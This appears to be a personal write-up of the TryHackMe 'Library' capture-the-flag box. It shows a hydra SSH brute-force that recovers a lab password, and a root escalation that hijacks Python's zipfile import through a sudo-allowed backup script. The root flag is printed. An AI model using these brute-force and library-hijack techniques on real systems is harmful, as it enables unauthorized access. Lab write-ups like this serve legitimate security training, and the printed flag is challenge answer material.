Introduction

boot2root machine for FIT and bsides guatemala CTF

This is Library from THM. Like Dav, this one is ranked easy and doesn’t give any hints as to what it’s about. I’ve been away at the beach for a few days hence no hacking. In fact, these were the first days I’ve not done any at all for probably 6 months.

Ports

HTTP and SSH only, on the standard ports.

HTTP

This is where I spent the vast majority of the time on this box. The landing page was a very basic blog but did include a form supposedly for posting a comment. I tried an escalating series of gobusting searches but found nothing useful.

I ran various fuzzing techniques on the POST request with Burp Suite. I captured a request and ran it against sqlmap; nothing.

I downloaded a few images and ran some basic stego checks against them; nothing.

Eventually I ran hydra against SSH:

root@kali:/opt/tryhackme/bsidesgtlibrary# hydra -l meliodas -P /usr/share/wordlists/rockyou.txt ssh://10.10.75.13
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-01-02 03:36:49
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://10.10.75.13:22/
[STATUS] 151.00 tries/min, 151 tries in 00:01h, 14344249 to do in 1583:16h, 16 active
[22][ssh] host: 10.10.75.13   login: meliodas   password: iloveyou1

Privesc

Presumably this was supposed to be the main challenge of this box, but it’s effectively the same as Wonderland.

meliodas@ubuntu:~$ sudo -l
Matching Defaults entries for meliodas on ubuntu:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User meliodas may run the following commands on ubuntu:
    (ALL) NOPASSWD: /usr/bin/python* /home/meliodas/bak.py
meliodas@ubuntu:~$ cat /home/meliodas/bak.py
#!/usr/bin/env python
import os
import zipfile

def zipdir(path, ziph):
    for root, dirs, files in os.walk(path):
        for file in files:
            ziph.write(os.path.join(root, file))

if __name__ == '__main__':
    zipf = zipfile.ZipFile('/var/backups/website.zip', 'w', zipfile.ZIP_DEFLATED)
    zipdir('/var/www/html', zipf)
    zipf.close()
meliodas@ubuntu:~$

So we have a script which we can run as root and which imports both os and zipfile. The script lives in our own home directory, and Python puts the directory containing the script at the front of sys.path before the standard library, so a zipfile.py dropped next to bak.py gets imported in place of the real module (it only needs to be importable, not executable). We create our own version of zipfile.py, and ….

root@ubuntu:~# cat zipfile.py 
import os
os.system("/bin/bash")
meliodas@ubuntu:~$ sudo -u root /usr/bin/python3 /home/meliodas/bak.py
root@ubuntu:~# cd /root/
root@ubuntu:/root# ls -lash
total 28K
4.0K drwx------  3 root root 4.0K Aug 24  2019 .
4.0K drwxr-xr-x 22 root root 4.0K Aug 24  2019 ..
4.0K -rw-------  1 root root   43 Aug 24  2019 .bash_history
4.0K -rw-r--r--  1 root root 3.1K Oct 22  2015 .bashrc
4.0K drwxr-xr-x  2 root root 4.0K Aug 23  2019 .nano
4.0K -rw-r--r--  1 root root  148 Aug 17  2015 .profile
4.0K -rw-r--r--  1 root root   33 Aug 23  2019 root.txt
root@ubuntu:/root# cat root.txt
e8c8c6c256c35515d1d344ee0488c617

That was that.